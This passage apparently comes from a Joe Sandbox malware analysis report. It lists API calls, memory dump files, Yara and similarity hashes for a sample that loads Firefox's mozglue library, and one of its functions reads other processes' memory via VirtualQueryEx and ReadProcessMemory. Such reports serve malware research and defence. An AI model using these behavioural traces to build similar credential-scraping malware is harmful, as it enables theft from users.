                                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,?,?,?,?,6BBB4843,?), ref: 6BB74D38
                                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6BB74667,?,?,?,?,?,?,?,?,6BBB4843,?), ref: 6BB74DD1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1497960986-0
                                                                                                                                                                                                                              • Opcode ID: 3d4ebcb5f3c724ebc64e85f779f9466fd5593ab313549cd7a89a66a975c8c651
                                                                                                                                                                                                                              • Instruction ID: 91dd74a4bd073bfdd7fe4307c35059805208a2abf4053b652520f13ff08d1676
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d4ebcb5f3c724ebc64e85f779f9466fd5593ab313549cd7a89a66a975c8c651
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3518A71504A808FE334AB3CD96875A77A2AF02729F404A3DE1B7CBBD1D779E9448B41
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • moz_xmalloc.MOZGLUE(?,?,?,6BB81999), ref: 6BB7EA39
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,7FFFFFFE), ref: 6BB7EA5C
                                                                                                                                                                                                                              • memset.VCRUNTIME140(7FFFFFFE,00000000,?), ref: 6BB7EA76
                                                                                                                                                                                                                              • moz_xmalloc.MOZGLUE(-00000001,?,?,6BB81999), ref: 6BB7EA9D
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,7FFFFFFE,?,?,?,6BB81999), ref: 6BB7EAC2
                                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?), ref: 6BB7EADC
                                                                                                                                                                                                                              • free.MOZGLUE(7FFFFFFE,?,?,?,?), ref: 6BB7EB0B
                                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 6BB7EB27
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpymemsetmoz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 706364981-0
                                                                                                                                                                                                                              • Opcode ID: d6cb13fb9116afe183ef0c8f3ea3db1ba6e3d9cf00c5cbce9751bde1fcc309e8
                                                                                                                                                                                                                              • Instruction ID: 0e95973e9a661dffcf59600903efcf52db6e314bc275c50e6ca3e3dda5ae7695
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6cb13fb9116afe183ef0c8f3ea3db1ba6e3d9cf00c5cbce9751bde1fcc309e8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B4193B1900255DFDB24DF68DC81AAE7BB9FF44254F150638E825E7394E734EA04C7A1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BBCD36B
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBCD38A
                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(?), ref: 6BBCD39D
                                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BBCD3E1
                                                                                                                                                                                                                              • free.MOZGLUE ref: 6BBCD408
                                                                                                                                                                                                                                • Part of subcall function 6BBACBE8: GetCurrentProcess.KERNEL32(?,6BB731A7), ref: 6BBACBF1
                                                                                                                                                                                                                                • Part of subcall function 6BBACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6BB731A7), ref: 6BBACBFA
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBCD44B
                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(?), ref: 6BBCD457
                                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(?,?), ref: 6BBCD472
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExclusiveLock$Current$AcquireProcessReleaseThread$StampTerminateTimeV01@@Value@mozilla@@free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3843575911-0
                                                                                                                                                                                                                              • Opcode ID: 6056702259db51f2af893ad1ff828bcdc3923eea36fcdc7261de014d01bc5130
                                                                                                                                                                                                                              • Instruction ID: a4b2d0c8f6a00362e1e655250ef6fd9af4d69a120427ed5d978513d24be716a1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6056702259db51f2af893ad1ff828bcdc3923eea36fcdc7261de014d01bc5130
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B241DD799443458FCB14DF64D484AAFBBB9FF85314F00492DEA6287340EB7AE944CB92
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • strlen.MSVCRT ref: 00413BDF
                                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT ref: 00413C0D
                                                                                                                                                                                                                                • Part of subcall function 00413890: strlen.MSVCRT ref: 004138A1
                                                                                                                                                                                                                                • Part of subcall function 00413890: strlen.MSVCRT ref: 004138C5
                                                                                                                                                                                                                              • VirtualQueryEx.KERNEL32(00413FCD,00000000,?,0000001C), ref: 00413C52
                                                                                                                                                                                                                              • ??_V@YAXPAX@Z.MSVCRT ref: 00413D73
                                                                                                                                                                                                                                • Part of subcall function 00413AA0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00413AB8
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: strlen$MemoryProcessQueryReadVirtual
                                                                                                                                                                                                                              • String ID: @$Z>A
                                                                                                                                                                                                                              • API String ID: 2950663791-2427737632
                                                                                                                                                                                                                              • Opcode ID: c34cf874e28939f0e2f9d61df82db9ff8d9d9859511bff8662e41e87a2571aa0
                                                                                                                                                                                                                              • Instruction ID: 18b3d1c53e1ab9283c7d4f20bb5e0d2682d9205760932c7229ac25ba092b9e39
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c34cf874e28939f0e2f9d61df82db9ff8d9d9859511bff8662e41e87a2571aa0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2851F9B5D00109ABDB04CF98E981AEFB7B5FF88305F108119F919A7340D738AA51CBA5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6BBB4AB7,?,6BB743CF,?,6BB742D2), ref: 6BBB4B48
                                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,80000000,?,6BBB4AB7,?,6BB743CF,?,6BB742D2), ref: 6BBB4B7F
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6BBB4AB7,?,6BB743CF,?,6BB742D2), ref: 6BBB4B94
                                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6BBB4AB7,?,6BB743CF,?,6BB742D2), ref: 6BBB4BBC
                                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,pid:,00000004,?,?,?,6BBB4AB7,?,6BB743CF,?,6BB742D2), ref: 6BBB4BEE
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy$_invalid_parameter_noinfo_noreturnfreestrncmp
                                                                                                                                                                                                                              • String ID: pid:
                                                                                                                                                                                                                              • API String ID: 1916652239-3403741246
                                                                                                                                                                                                                              • Opcode ID: 4f88a7ccb273cd81b137fb46273ec858229312e0d5a0eda4fd7161e9d67cc373
                                                                                                                                                                                                                              • Instruction ID: 0f0873ee8a834240981f163932b0d988c091a824d10e28d8731960f502ba6eb6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f88a7ccb273cd81b137fb46273ec858229312e0d5a0eda4fd7161e9d67cc373
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D41C471B042999BCB14CFB8EC805AFBBE9FF85324B144638E969D7381DB349905C7A1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(6BBFE220,?), ref: 6BBDBC2D
                                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(6BBFE220), ref: 6BBDBC42
                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,00000000,6BBEE300), ref: 6BBDBC82
                                                                                                                                                                                                                              • RtlFreeUnicodeString.NTDLL(6BBFE210), ref: 6BBDBC91
                                                                                                                                                                                                                              • RtlFreeUnicodeString.NTDLL(6BBFE208), ref: 6BBDBCA3
                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,00000000,6BBFE21C), ref: 6BBDBCD2
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6BBDBCD8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3047341122-0
                                                                                                                                                                                                                              • Opcode ID: 8f65b8e8a5ee1dc045541fc80e5a7109fc3b9b46ea938502cc71c738db9a3cb9
                                                                                                                                                                                                                              • Instruction ID: a0446173f7fa606186583bcf74a582dee0cab97b17bb811f7125284c24456098
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f65b8e8a5ee1dc045541fc80e5a7109fc3b9b46ea938502cc71c738db9a3cb9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B21F5725007448FE7308F16D880B6ABBA9FF41754F49846DE4195B610CBBDF842CBA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(6BBFE220,?,?,?,?,6BB83899,?), ref: 6BB838B2
                                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(6BBFE220,?,?,?,6BB83899,?), ref: 6BB838C3
                                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,6BB83899,?), ref: 6BB838F1
                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6BB83920
                                                                                                                                                                                                                              • RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6BB83899,?), ref: 6BB8392F
                                                                                                                                                                                                                              • RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6BB83899,?), ref: 6BB83943
                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,00000000,0000002C), ref: 6BB8396E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3047341122-0
                                                                                                                                                                                                                              • Opcode ID: b3c3aec88067f75c57a9b4d51d569b420604693519d2be9fa85e6f051dd7024c
                                                                                                                                                                                                                              • Instruction ID: b8f890827100a96be8062ee24cdb752243d90cd8c38cf1dbad33ef7c6cc16a4a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3c3aec88067f75c57a9b4d51d569b420604693519d2be9fa85e6f051dd7024c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9210072600B90DFD720CF25D880B9ABBE9EF45324F128469F95A97710C739E842CBD1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBCD1EC
                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(?), ref: 6BBCD1F5
                                                                                                                                                                                                                                • Part of subcall function 6BBCAD40: moz_malloc_usable_size.MOZGLUE(?), ref: 6BBCAE20
                                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BBCD211
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBCD217
                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(?), ref: 6BBCD226
                                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BBCD279
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6BBCD2B2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExclusiveLock$AcquireCurrentReleaseThread$freemoz_malloc_usable_size
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3049780610-0
                                                                                                                                                                                                                              • Opcode ID: 934b10f19e2a9f9f63402c8366dc8e9df98db6866e3c7ffd81bc1ddb3ebfcf0d
                                                                                                                                                                                                                              • Instruction ID: 8f88be5e03fffdff8ee24b0cd4a6339b96beb11ab2c0ce27d0abda275ce133f9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 934b10f19e2a9f9f63402c8366dc8e9df98db6866e3c7ffd81bc1ddb3ebfcf0d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C217C75604745EFCB04DF34D488AAEB7A5FF8A324F10452EE51A8B340DB35E905CB96
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 6BBB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BB84A68), ref: 6BBB945E
                                                                                                                                                                                                                                • Part of subcall function 6BBB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BBB9470
                                                                                                                                                                                                                                • Part of subcall function 6BBB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BBB9482
                                                                                                                                                                                                                                • Part of subcall function 6BBB9420: __Init_thread_footer.LIBCMT ref: 6BBB949F
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBB99C1
                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBB99CE
                                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBB99F8
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBB9A05
                                                                                                                                                                                                                              • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BBB9A0D
                                                                                                                                                                                                                                • Part of subcall function 6BBB9A60: GetCurrentThreadId.KERNEL32 ref: 6BBB9A95
                                                                                                                                                                                                                                • Part of subcall function 6BBB9A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BBB9A9D
                                                                                                                                                                                                                                • Part of subcall function 6BBB9A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6BBB9ACC
                                                                                                                                                                                                                                • Part of subcall function 6BBB9A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BBB9BA7
                                                                                                                                                                                                                                • Part of subcall function 6BBB9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6BBB9BB8
                                                                                                                                                                                                                                • Part of subcall function 6BBB9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6BBB9BC9
                                                                                                                                                                                                                                • Part of subcall function 6BBACBE8: GetCurrentProcess.KERNEL32(?,6BB731A7), ref: 6BBACBF1
                                                                                                                                                                                                                                • Part of subcall function 6BBACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6BB731A7), ref: 6BBACBFA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • [I %d/%d] profiler_stream_json_for_this_process, xrefs: 6BBB9A15
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Current$ThreadTimegetenv$ExclusiveLockProcessStampV01@@Value@mozilla@@_getpid$?profiler_time@baseprofiler@mozilla@@AcquireInit_thread_footerNow@ReleaseStamp@mozilla@@TerminateV12@_
                                                                                                                                                                                                                              • String ID: [I %d/%d] profiler_stream_json_for_this_process
                                                                                                                                                                                                                              • API String ID: 2359002670-141131661
                                                                                                                                                                                                                              • Opcode ID: 3f00c4d492bceecf361b6753a5f6b3c41b166e3bfc6f599033740783211cf4bb
                                                                                                                                                                                                                              • Instruction ID: 3dd40d5d62b1da2cbda46d8f78bbeb3882434e44eb7bfaa34e0f3ffe9bd5377c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f00c4d492bceecf361b6753a5f6b3c41b166e3bfc6f599033740783211cf4bb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6101D239C051A49BEB245F25B84967D3B6CEB53358F014016ED8553342CB3E8805C6B2
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 6BBAAB89: EnterCriticalSection.KERNEL32(6BBFE370,?,?,?,6BB734DE,6BBFF6CC,?,?,?,?,?,?,?,6BB73284), ref: 6BBAAB94
                                                                                                                                                                                                                                • Part of subcall function 6BBAAB89: LeaveCriticalSection.KERNEL32(6BBFE370,?,6BB734DE,6BBFF6CC,?,?,?,?,?,?,?,6BB73284,?,?,6BB956F6), ref: 6BBAABD1
                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(combase.dll), ref: 6BB8631B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 6BB8633A
                                                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 6BB8634E
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32 ref: 6BB86376
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                                                                                              • String ID: CoUninitialize$combase.dll
                                                                                                                                                                                                                              • API String ID: 4190559335-3846590027
                                                                                                                                                                                                                              • Opcode ID: 9d8d20a839d2f0af3efb340d4373d156aef57b30a5685111832ac05624e13af9
                                                                                                                                                                                                                              • Instruction ID: 679f573c3e0661dbc9b816cbf5ffcbe77abf6b28bc369592717532501c5363bd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d8d20a839d2f0af3efb340d4373d156aef57b30a5685111832ac05624e13af9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E011AB9916281CFEB149F2CF558B3877AEF70A315F044169D902C3680E73AE416CE65
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BBC9BAE
                                                                                                                                                                                                                              • free.MOZGLUE(?,?), ref: 6BBC9BC3
                                                                                                                                                                                                                              • free.MOZGLUE(?,?), ref: 6BBC9BD9
                                                                                                                                                                                                                                • Part of subcall function 6BBC93B0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6BBC94C8
                                                                                                                                                                                                                                • Part of subcall function 6BBC93B0: free.MOZGLUE(6BBC9281,?), ref: 6BBC94DD
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
